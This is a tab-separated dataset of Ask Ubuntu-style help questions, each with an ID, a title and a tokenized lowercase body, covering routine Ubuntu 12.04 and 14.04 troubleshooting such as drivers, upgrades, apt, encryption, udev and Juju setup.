510617	how to unlock my external hard drive ( wd ) in ubuntu 14.04 ?	i have an external hard drive ( wd ) and it have a password.i cant open this drive in ubuntu and in wd.com is not support for linux . and now how to unlock my external hard drive ?
510618	brightness problem	i have a lenovo z570 laptop . i have currently switched to ubuntu 14.04 . i am unable to control the brightness and it is always set to high . please help . i have searched for the problem but none of them worked .
510619	add-apt-repository hangs	when trying to add a repository using the command sudo add-apt-repository ppa : xorg-edgers/ppa the command just hangs after i type in my password , and then after a couple of minutes gives me the message : can not add ppa : ppa : xorg-edgers/ppa please check the ppa name or format is correct i have a system-wide proxy set , and apt-get is able to access the repositories . i tried adding a 95proxies to /etc/apt/apt-conf.d/ . with the proxies specified there , as per the first answer in this question : how do i set systemwide proxy servers in xubuntu , lubuntu or ubuntu studio ? when i ctrl-c the add-apt-repositories command i get a whole bunch of pythonic looking error messages about sock.connect and http/client.py so it looks like some sort of network problem is holding it up . i 'm guessing it 's because the it department here have blocked the port that it 's trying to connect on . is there any way to get apt to use port 80 ?
510622	problems after upgrading to 14.04 from 12.04	i have recently tried to upgrade my ubuntu from 12.04 to 14.04 lts . during the upgrade , no errors or warnings appeared . when i start up , a screen appears saying '' error - diskfilter writes are not supported '' it boots up normally , showing the login screen , however , logging in to any account ( i have two on the machine ) just leads to a blank screen - i get the background of the login screen , can move the mouse , but nothing else happens . as i am fairly new to linux , i really do not know how to fix this . will i have to downgrade again to 12.04 ?
510624	encrypted lvm , passphrase nor working	i am using ubuntu server 14 on virtual box and i have used entire disk and set up encrypted lvm , the system ran completely fine on first start , but once i rebooted it the same passphrase is not working anymore . it is showing something like this : any help would be appreciated , thanks in advance . ps : sorry for bad english .
510626	how to download and install a single package with all it 's dependencies ?	how to download a package with all its dependencies so that it can be installed later on another computer without the internet . i tried at official packages for ubuntu . but it also needs to be download individually all dependencies .
510627	postfix sasl auth on ubuntu server	i can connect to the mail server over telnet and send messages to local users without authentication . is it the reject_unauth_destination parameter that permits this ? what is the recommended practice for such cases ? smtpd_sasl_auth_enable = yes smtpd_sasl_security_options = noanonymous smtpd_recipient_restrictions = permit_mynetworks , permit_sasl_authenticated , reject_unauth_pipelining , reject_non_fqdn_sender , reject_non_fqdn_recipient , reject_unknown_sender_domain , reject_unknown_recipient_domain , reject_unauth_destination ... upd is the above behavior expected , i.e . required for incoming to work at all ? are there any recommended hardening practices to somehow limit such exposure if that 's the case ?
510629	why does ubuntu 14.04 not connect to the internet immediately after a reboot ?	iâm using the ethernet interface with a cable connected . every time i start up my machine and boot into ubuntu , it is not connected to the internet . sometimes it never connects at all . sometimes it connects after a delay , which varies from about 30 seconds to 2 minutes . i can not find a proper solution for this . it is really annoying every day . these are system logs which may be related to this issue : aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > networkmanager ( version 0.9.8.8 ) is starting ... aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > read config file /etc/networkmanager/networkmanager.conf aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > wext support is enabled aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > vpn : loaded org.freedesktop.networkmanager.pptp aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > vpn : loaded org.freedesktop.networkmanager.openvpn aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > dns : loaded plugin dnsmasq aug 13 09:24:50 dummy-desktop-ubuntu dbus [ 829 ] : [ system ] activating service name='org.freedesktop.policykit1 ' ( using servicehelper ) aug 13 09:24:50 dummy-desktop-ubuntu polkitd [ 1041 ] : started daemon version 0.105 using authority implementation `local ' version `0.105' aug 13 09:24:50 dummy-desktop-ubuntu dbus [ 829 ] : [ system ] successfully activated service 'org.freedesktop.policykit1' aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ifupdown : init ! aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ifupdown : update_system_hostname aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : interface-parser : parsing file /etc/network/interfaces aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : interface-parser : finished parsing file /etc/network/interfaces aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scpluginifupdown : management mode : unmanaged aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:04.0/0000:02:00.0/net/eth0 , iface : eth0 ) aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:04.0/0000:02:00.0/net/eth0 , iface : eth0 ) : no ifupdown configuration found . aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/lo , iface : lo ) aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/lo , iface : lo ) : no ifupdown configuration found . aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ifupdown : end _init . aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > loaded plugin ifupdown : ( c ) 2008 canonical ltd. to report bugs please use the networkmanager mailing list . aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > loaded plugin keyfile : ( c ) 2007 - 2010 red hat , inc. to report bugs please use the networkmanager mailing list . aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ofono : acquired d-bus service com.canonical.nmofono aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ofono : init ! aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ofono : end _init . aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > loaded plugin ( null ) : ( null ) aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : ifupdown : get unmanaged devices count : 0 aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ifupdown : ( 32775728 ) ... get_connections . aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ifupdown : ( 32775728 ) ... get_connections ( managed=false ) : return empty list . aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : keyfile : parsing ethernet connection 1 ... aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : keyfile : read connection 'ethernet connection 1' aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ofono : ( 32580272 ) ... get_connections . aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : scplugin-ofono : ( 32580272 ) connections count : 0 aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : ifupdown : get unmanaged devices count : 0 aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > monitoring kernel firmware directory '/lib/firmware ' . aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > wifi enabled by radio killswitch ; enabled by state file aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > wwan enabled by radio killswitch ; enabled by state file aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > wimax enabled by radio killswitch ; enabled by state file aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > networking is enabled by state file aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < warn > failed to allocate link cache : ( -12 ) object not found aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > ( eth0 ) : carrier is off aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > ( eth0 ) : new ethernet device ( driver : 'r8169 ' ifindex : 2 ) aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > ( eth0 ) : exported as /org/freedesktop/networkmanager/devices/0 aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > ( eth0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] aug 13 09:24:50 dummy-desktop-ubuntu networkmanager [ 1028 ] : < info > ( eth0 ) : bringing up device .
510630	ipython notebook keyboard shortcuts not working in chrome	i 'm running a local ipython notebook server . ( ipython version 1.2.1 ) . running the notebook under chrome means the keyboard shortcuts do n't work . ( chrome version 36.0.1985.125 ) running under firefox works ( firefox version 31.0 ) . is there any way i can get ipython notebook keyboard shortcuts working in chrome / ubuntu ?
510632	can not login after upgrade from 12.04 to 14.04	i recently upgraded from ubuntu 12.04 to 14.04 and faced the filesystem check or mount failed issue as described here : ubuntu 13.04 to 13.10 : filesystem check or mount failed the solution worked but now im unable to log in to the ui . it shows the login screen and on entering the password it just flashes something from the terminal and goes back to the login screen . also , starting smb/cifs active directory server fails on boot . edit : i checked /var/log/boot.log and found that starting apparmor profiles is failing . how do i fix that ? !
510636	`` negative seek offset '' error while installing matlab 2013a on ubuntu 14.04 lts	i am trying to download matlab 2013a on my newly installed ubuntu 14.04 . after 75 % of the installation it stops with the following message : the following error was detected while installing physmod/drive_demos_common : negative seek offset would you like to retry installing physmod/drive_demos_common ? if you press no , the installer will exit without completing the installation . more information can be found at /tmp/mathworks_root.log i am new in the linux .
510637	how to test that my ubuntu is alive on network ?	my question is , how to check that my ubuntu desktop is alive , if ping is disabled in firewall . what methods help me to figure out the status of my ubuntu ?
510640	browser freezes frequently . will it be a swap problem ?	i am facing a problem with very slow browser apps , wine games and unity . i am using ubuntu 14.04 on my sandisk cruzer 32gb flash drive . i have n53sv laptop with 16 gb ram and an nvidia card , and switching with my intel one works fine , i 've recently updated my nvidia with cuda , but the main problem from the beginning is the swap . i 've read many posts , that say to aviod using swap . ( like this one ) . is there any way to tweak my system and make read and write speeds faster and run games and apps without freezes and hangs . my last question is : in a modern os , is it important to create and use swap ?
510642	`` rfkill list all '' shows nothing in command line	i 'm using dual boot of ubuntu 12.04 and windows 8.1 . when i run rfkill list all it shows as follows : : ~ $ rfkill list all : ~ $ please help . update : laptop model : fujisu lifebook lh532 . it has a wifi and a bluetooth device ( ralink rt3290 ) . both of them work fine in windows . in ubuntu , i made my wifi working by web help and tried for bluetooth but still no luck . lspci is : : ~ $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) 03:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 03:00.1 bluetooth : ralink corp. rt3290 bluetooth and iwconfig is : ~ $ iwconfig lo no wireless extensions . usb0 no wireless extensions . ra0 ralink sta essid : '' '' nickname : '' rt3290sta '' mode : auto frequency=2.412 ghz access point : not-associated bit rate:1 mb/s rts thr : off fragment thr : off link quality=10/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions .
510644	where do i get all of the versions of ubuntu + flavors	this took me several days to do . if it does n't render right , i made and test it for firefox ( with zoom 100 % ) version 31 since it comes default with ubuntu . please note , that after 14.10 comes out to stable , some of the links will be broken , and i did n't add ppc because it is dead on the desktop . similarly , it is the same reason why i did n't add ubuntu netbook remix or add the sever edition of edubuntu . if there are links that do n't work please tell me and i will try my best to fix them . table of contents mythbuntu edubuntu ubuntu ( desktop , and server ) ubuntu studio ubuntu gnome kubuntu xubuntu lubuntu also see : ubuntu flavors on the ubuntu wiki how to remove the 'tile ' background in the launcher icons ? how can i get ubuntu 12.04 to act and feel like ubuntu 10.04 ? what is the exact difference between a 'terminal ' , a 'shell ' , a 'tty ' and a 'console ' ? how do i make an ubuntu usb flash drive installer / bootable usb ?
510656	how to copy all `` apt-get update '' cache	how can i copy all apt-get update cache to another computer , so that it does n't need be updated again and again after new installation ?
510657	need help for run charm-server in local server ?	hi i need to run juju charm-store in my local machine.i clone this one ( https : //github.com/juju/charmstore ) and try to run the server.but it failed.i want to install juju-server and build environment for maintain juju-charms locally.i want simple guide for doing this.first of all i want to know is this possible.in simply i want to run juju charm-store server and then developers can deploy their charms to our charm-store . thanks sajith
510663	remove thunderbird from the indicator-messages	ubuntu 14.04 . i accidentally started thunderbird once , i do not use it . now i can not remove thunderbird from the indicator-messages menu . as per the doc , i have tried to : copy the file /usr/share/indicators/messages/applications/thunderbird to ~/.config/indicators/messages/applications-blacklist/ rename /usr/share/indicators/messages/applications/thunderbird but not to remove it altogether any reason why this would not work ?
510667	ubuntu iso structure	i am working on an ubuntu iso personalization script based on the buggy uck .. the uck team seemed to know what they were doing , they used the structure of the ubuntu iso image a lot .. the problem is , there are several files i ca n't understand , like : iso/casper/filesystem.squashfs , and rootfs .. these files seem to be really important for customizing the environment . that said , i need a brief explanation of the structure of linux iso images in general , and ubuntu iso in specific . thanks ..
510668	unable to connect to a wireless network created with hostapd on ubuntu 14.04 lts	i have created hostapd network . in configuration file hostapd.conf i enabled wap2 with the wpa_passphrase=passphrase . but when i try to connect from a device to this network , am getting an error the network pasword you entered is incorrect for your reference , the hostapd.conf is as below interface=wlan0 driver=nl80211 bridge=br0 ctrl_interface=/var/run/hostapd hw_mode=g ssid=nuc channel=1 wme_enabled=1 ieee80211n=1 acaddr_acl=0 uth_algs=1 gnore_broadcast_ssid=0 wpa=2 wpa_passphrase=passphrase wpa_key_mgmt=wpa-psk wpa_pairwise=tkip rsn_pairwise=ccmp
510670	opening chrome with launcher in 14.04 does n't take focus	using the launcher to open chrome ( super , chrome , enter ) does not take focus from what ever application was running previously . kinda defeating the purpose of the launcher . at the same time , the text cursor is 'alive'/blinking in both chrome in the search bar and any previous application . is there is a setting to force ubuntu to move focus on opening a new application ? note : i am using multiple desktops and 2 monitors if that is relevant
510671	how do i uninstall ttf-mscorefonts while it is currently 'half installed ' ?	i tried using this as a step to watching netflix . the package itself is half installed or something and removing or purging or reinstalling it does n't seem to do anything . it wo n't let me remove it because it 's in a bad/inconsistent state and prompted me to reinstall it . but it has errors in reinstalling and wo n't let me remove the package at all . i tried both from the terminal and the software center , and i ca n't remove or fix this at all . sudo apt-get install ttf-mscorefonts-installer reading package lists ... done building dependency tree reading state information ... done ttf-mscorefonts-installer is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 174 not upgraded . 1 not fully installed or removed . need to get 0 b/27.8 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y dpkg : error processing package ttf-mscorefonts-installer ( -- configure ) : package ttf-mscorefonts-installer is not ready for configuration can not configure ( current status `half-installed ' ) errors were encountered while processing : ttf-mscorefonts-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) sudo apt-get remove ttf-mscorefonts-installer reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : ttf-mscorefonts-installer 0 upgraded , 0 newly installed , 1 to remove and 174 not upgraded . 1 not fully installed or removed . after this operation , 134 kb disk space will be freed . do you want to continue ? [ y/n ] y dpkg : error processing package ttf-mscorefonts-installer ( -- remove ) : package is in a very bad inconsistent state ; you should reinstall it before attempting a removal errors were encountered while processing : ttf-mscorefonts-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 )
510673	ca n't make juju charm-store server ?	i am trying to run juju charm-server in my local machine.i followed these steps . ( https : //github.com/juju/charmstore ) but it gives this error.when i enter make command it gives this one . makefile:49 : *** can not build ; /home/sajith/projects/backup/charm-store-server/charmstore is not on gopath . stop in my bash file i have added goroot=/home/sajith/install/go/go gopath=/home/sajith/projects/backup/charm-store-server/charmstore and then export goroot and gopath path= $ path : $ home/bin : $ goroot/bin export goroot export gopath i want to know how to setup these go variable for run juju charm-store server .
510674	ca n't start chrome , permission denied	here 's what i 'm getting : $ google-chrome [ 5934:5934:0812/222947 : error : process_singleton_linux.cc ( 394 ) ] readlink failed : permission denied [ 5934:5934:0812/222947 : error : process_singleton_linux.cc ( 240 ) ] readlink ( /home/julian/.config/google-chrome/singletonlock ) failed : permission denied [ 5934:5934:0812/222947 : error : process_singleton_linux.cc ( 240 ) ] readlink ( /home/julian/.config/google-chrome/singletonlock ) failed : permission denied [ 5934:5934:0812/222947 : error : process_singleton_linux.cc ( 264 ) ] failed to create /home/julian/.config/google-chrome/singletonlock : permission denied [ 5934:5934:0812/222947 : error : process_singleton_linux.cc ( 394 ) ] readlink failed : permission denied [ 5934:5934:0812/222947 : error : process_singleton_linux.cc ( 240 ) ] readlink ( /home/julian/.config/google-chrome/singletonlock ) failed : permission denied [ 5934:5934:0812/222947 : error : chrome_browser_main.cc ( 1209 ) ] failed to create a processsingleton for your profile directory . this means that running multiple instances would start multiple browser processes rather than opening a new window in the existing process . aborting now to avoid profile corruption . [ 5934:5965:0812/222947 : error : nss_util.cc ( 737 ) ] error initializing nss with a persistent database ( sql : /home/starkers/.pki/nssdb ) : nss error code : -8187 this is my fault as i 've fiddled with my permissions . however i would like to know how to get chrome working again . is there some kind of command to reset permissions ? i confess i 've been a bit of a cowboy but i do n't want to have to reinstall : (
510678	problem after using luksremovekey ?	i have an encrypted partition on /dev/sda5 , yesterday i use cryptsetup to remove the encryption using cryptsetup luksremovekey /dev/sda5 , but when i restart i have to provide a passphrase for decryption ? ( i use the old one but i have this message : no key available with this passphrase ) when i switch to initramfs mode : i have all key slot disabled ? ( using cryptsetup luksdump /dev/sda5 ) thank you in advance !
510680	wifi configuraton on ubuntu 14.04 or wifi not working with ubuntu 14.04	i 'm in my universtiy and they provide wifi privileged with a unique username and password , now i 've installed ubuntu 14.04 lts , turned on wifi , given my username and password but i could n't configure my wireless connection . any help ?
510681	how to make my udev rule work	my usb device keeps changing its number in its name /dev/ttyusb ? . i have seen this and this , and tried to do the same with no luck . gauthier @ sobel : /etc/udev/rules.d $ udevadm info -a -p $ ( udevadm info -q path -n /dev/ttyusb1 ) udevadm info starts with the device specified by the devpath and then walks up the chain of parent devices . it prints for every device found , all possible attributes in the udev rules key format . a rule to match , can be composed by the attributes of the device and the attributes from one single parent device . looking at device '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1/2-1.1:1.0/ttyusb1/tty/ttyusb1 ' : kernel== '' ttyusb1 '' subsystem== '' tty '' driver== '' '' looking at parent device '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1/2-1.1:1.0/ttyusb1 ' : kernels== '' ttyusb1 '' subsystems== '' usb-serial '' drivers== '' ftdi_sio '' attrs { port_number } == '' 0 '' attrs { latency_timer } == '' 1 '' [ ... ] then i created a file /etc/udev/rules.d/50-udev.rules ( it did not exist ) and put this inside : subsystem== '' usb-serial '' , kernel== '' ttyusb ? `` , symlink+= '' ttyusbserial '' but did not get the symlink , even after udevadm trigger : gauthier @ sobel : /etc/udev/rules.d $ ls /dev|grep usb ttyusb1 how can i create a device name that does not change ? what am i doing wrong with my rule ?
510684	my laptop ( alienware m17x r3 ) keeps overheating on 14.04 ( lts ) while w7 keeps it cool	i 've installed xubuntu on my laptop , because i love it , but about 30 minutes in it becomes so incredibly hot that i am scared to keep it running , lest i burn out all of the circuitry . i hope there 's someone out there who knows how to fix this problem , because i do prefer xubuntu over windows , otherwise . i got a prefab version with 2.33ghz i7 8gb ddr3 ati hd6xxxm with 1gb ( or 2 ? i 'd have to check ) all in all , it feels as if it 's just running the processor at full blast continuously , maybe the gpu as well ? i do n't know too much about hardware . i 'm okay with software but i really do n't know what to tell you that might be relevant other than this . please help !
510686	laptop with ubuntu logo on it ?	ok , this might be a little silly . i want to buy a new laptop and i really really want one with the ubuntu logo on the back of it . not a sticker or anything , i want it to be part of the casing - like apple or dell or whatever . i googled around but i could n't find anyting besides people daydreaming and making cool pictures , and i want a practical answer . is there any percievable way to get this ( also , without it costing a fortune ) ? and if so , how ?
510689	wget security.ubuntu.com not working on ubuntu	we are able to use wget for other urls , such as google.com , but wget security.ubuntu.com not working and giving output : resolving security.ubuntu.com ( security.ubuntu.com ) ... 91.189.92.200 , 91.189.92.201 , 91.189.88.149 , ... connecting to security.ubuntu.com ( security.ubuntu.com ) |91.189.92.200|:80 ... failed : connection timed out . and apt-get also not working . the apt-get install php5-curl giving following : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : checkbox gnome-dictionary gnome-search-tool libgdict-1.0-6 libgdict-common printer-driver-hpijs python3-checkbox use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libapache2-mod-php5 php5-cli php5-common php5-gd php5-mysql php5-readline suggested packages : php-pear php5-user-cache the following new packages will be installed : php5-curl the following packages will be upgraded : libapache2-mod-php5 php5-cli php5-common php5-gd php5-mysql php5-readline 6 upgraded , 1 newly installed , 0 to remove and 283 not upgraded . need to get 4,864 kb of archives . after this operation , 142 kb of additional disk space will be used . do you want to continue ? [ y/n ] y warning : the following packages can not be authenticated ! php5-readline php5-cli php5-mysql php5-gd libapache2-mod-php5 php5-common php5-curl install these packages without verification ? [ y/n ] y 0 % [ connecting to us-east-1.ec2.archive.ubuntu.com ( 91.189.91.13 ) ] but another server in the same vpc which is actually a copy of the ami on amazon is also working . the configuration is exactly the same on both servers ( the one that works and the one that doesnât ) . the external ip addresses of server that not works : 54.210.0.128 54.210.0.13 thanks
510694	which ubuntu os is best for my old core duo 1.66ghz laptop as of 13 august 2014 ?	first question posted on site , so please excuse any errors ( although i have read through the terms and rules ) . i have seen some similar questions but would like the latest advice as i know ubuntu is developing all the time . i have an 8 year old laptop , an acer aspire 5612 wlmi that only has win xp as os . it has intel core duo t2300 ( 1.66ghz-667mhz -2mb l2 cache ) processor , 80gb hard drive , 1gb ddr2 ram . what would be the optimum ubuntu product to install for a home user ( with only moderate it ability ) , who would like to just browse , watch tv , etc ? the laptop will be used by children so the response times need to be compatible with impatient users ! had thought about lubuntu 14.04 ? many thanks for any replies .
510697	missing postgresql postmaster.pid	i have postgresql 8.4 installed on ubuntu 12.04 . when i start postgresql service through terminal , it does n't start . then i check and found that postmaster.pid is missing . my question is how can i recover that postmaster.pid and what could possibly caused that missing postmaster.pid ? thanks . sorry for my bad english since i 'm not native .
510698	can volume snapshots be used as replacement for clonezilla images ?	i 've been always using classic disk partitioning and clonezilla images of selected partitions for fast recovery in case of a catastrophic disk failure . i 'm now testing lvm on a new system . it also uses whole disk encryption so the whole volume group is encrypted . q1 : can volume snapshots be used for the recovery in the way i 've been using clonezilla ? q2 : if q1 is yes , does it still apply if the physical partition is encrypted ?
510699	installing skype	i have recently like many received a notification from skype to upgrade my version of skype ( which is no more working anyway ) . i have followed all the steps on the website - then on ubuntu but still does not work . i have deleted the previous version ( and the icon has been removed from the bar ) . pleease help me ! i need to skype with my old mum who lives abroad and has just been for a surgery ... can some one assist ? please do note that i am not an it expert ... but can type commands when they are clear . thank you so much
510701	folder lock in ubuntu and windows	is there any way i can password protect or lock folder in ubuntu that can also be opened in windows 8 ? ? i am using windows 8 and ubuntu 14.04
510705	how can i fix the touchpad on my chromebook 14 using ubuntu 14.04 ?	i did a fresh install . still , neither `` dmesg | grep mouse '' nor `` cat /proc/bus/input/devices '' seem to show any input from a touchpad . i am still looking for a way to fix the touchpad . any help has been and will be greatly appreciated . ================================================================================ when i initially installed ubuntu , the touchpad worked just fine . after doing some updates , the touchpad quit working . i followed these instructions but that failed to fix the problem . `` lsmod | grep psmouse '' produces `` psmouse 109109 0 '' '' psmouse.conf '' does not seem to exist in /etc/modprobe.d neither `` dmesg | grep mouse '' nor `` cat /proc/bus/input/devices '' seem to show that the touchpad is a valid input . the following suggeested solution failed sudo modprobe -r psmouse sudo modprobe psmouse proto=imps '' sudo apt-get install xserver-xorg-input-synaptics gpointing-device-settings '' and trying the above solution did not work either . any help would be greatly appreciated .
510706	live-build / lb config help needed	hi i 'm trying to build custom iso for my asus t100ta wich is uefi only my goal is to make it bootable grub-efi 32bit my question is how do i specify mainline kernel= > ( 3.16 ) and grub-efi bootable ? here is my example : lb config -- bootloader grub-efi -d utopic -a i386 -- win32-loader false -- mode ubuntu -- archive-areas `` main restricted universe multiverse '' -- memtest memtest86+ -- debian-installer true -- debian-installer-gui true ­­ -- apt­recommends true summery : grub-efi /32 bit mainline kernel /32 bit unity please help me to correct it thank you .
510709	i can not find .bash_profile in ubuntu	i ca n't find .bash_profile in ubuntu 14.04 in my /home/user directory . i use ls -a command to see the .bash_profile , but there is n't such a file .
510711	converting jar to exe file in eclipse plugin	i am developing an eclipse plugin . when i extract my eclipse plugin project to my system , using export > plugin development > adding fragments & plugins . after exporting it , it 's not executing when i double-click on the .jar file . how can i change it into .exe format ?
510713	ifconfig ca n't see usb wireless	i have a wifi usb dongle which i have previously used on a raspberry pi ( this it is what it is target at ) . i am trying to get it working on an nvidia jetson tk1 , however i am having some problems . when i run ifconfig i ca n't see the wifi , only the ethernet and local loopback . iwconfig reports no wireless extensions on all devices . lsusb does find the device : bus 002 device 008 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter so i am not sure why the network tools ca n't see it . i have tried logging on with a gui and opening up the network settings through unity , but can not see any wireless devices either . not sure if this is useful , but output of lsmod : module size used by nvhost_vi 2940 0 how can i enable wireless networking on this computer ? command line approach is preferred , but either is fine . update i do n't have the kernel module rt2800usb anywhere on my system . if i do an apt-file search for rt2800usb it lists a number of packages of the pattern : linux-image-3.13.0-* . perhaps installing one of these will do the trick , but can anyone tell me if its safe to do so ?
510714	payday 2 wine problems	so i 'm wanting to play payday 2 . which i do successfully but i have some problems . the first one is that when i try to type something in chat it crashes and exits the game . i type the message into the box , click enter and boom it crashes . the second problem is that sometimes when i 'm playing i lose keyboard control and ca n't play with the keyboard . so i then ca n't alt + tab out of the game or press esc to exit the game . i 'm stuck there of which i 'm then kicked from the game because i ca n't get to the finish . these problems happen quite frequently and i do n't know how to fix them . any help is much appreciated . i have xubuntu .
510716	after 13.04 , 13.10 , 12.10 eol , is it possible to upgrade to 14.04 from 12.10 ?	i guess , the title can describe the real problem . i know that upgrading from 12.10 to 14.04 require step by step upgrades from 12.10 to 13.04 to 13.10 to 14.04 lts.but after the eol of 12.10 , 13.04 , 13.10 , i still ca n't update neither upgrade . i guess that one of the manual solutions are : 1- downgrade to 12.04 lts and then jump to 14.04lts , is it really possible ? 2- upgrade to 14.04lts via dvd , is it possible ? ? the last question , is there any solution to upgrade from 12.10 to 14.04 lts directly that can be expected in the near future ? ? thanks for helping
510717	error message `code.google.com/p/go.crypto/pbkdf2 file not found`	i am new to go language . i want to make a juju charm-store server but it 's giving me this error : imports code.google.com/p/go.crypto/pbkdf2 : exec : `` hg '' : executable file not found` this is the location charm-store ( https : //github.com/sajith4u/charmstore ) . this command failed to compile : go get -u -v -t github.com/juju/charmstore/.. does anyone know what is the reason is for this ?
510718	why can user increase nice of process but decrease requires root ?	i pulled up top and a program was using ~80-90 % cpu . i increased the niceness , to see if i could reduce the load . then i tried to reduce the nice of the same process back to it 's initial level and was told i did n't have proper privileges . is there a good reason for the disparity in privileges required here ?
510724	does ubuntu have a graphical software to compare and merge differences in files ?	i want to compare two or more files and merge the differnces which i want to . i was using windows os oftenly . but now working on ubuntu 12.04 os.in windows `` beyond compare '' made my work easier . but as now i shifted to linux , i am not able to find any tool or software like beyond compare in windows . please tell me if you know any . thank you very much .
510729	uninstalled vim , now ca n't install it again	i have removeded vim-tiny to get full installation following this tutorial and now i ca n't install vim by : $ sudo apt-get install vim reading package lists ... done building dependency tree reading state information ... done package vim is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'vim ' has no installation candidate if i simply try to install vim-tiny again situation is same : $ sudo apt-get install vim-tiny reading package lists ... done building dependency tree reading state information ... done package vim-tiny is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'vim-tiny ' has no installation candidate output of vim -version is : $ vim -version the program 'vim ' can be found in the following packages : * vim * vim-gnome * vim-tiny * vim-athena ( you will have to enable component called 'universe ' ) * vim-gtk ( you will have to enable component called 'universe ' ) * vim-nox ( you will have to enable component called 'universe ' ) try : sudo apt-get install < selected package > i have also tried sudo apt-get update and sudo apt-get upgrade and sudo apt-get dist-upgrade and it 's all the same . i am using ubuntu 14.04 lts . it is very strange situation for me to perform sudo apt-get remove vim-tiny but ca n't perform sudo apt-get install vim-tiny after this . any help ?
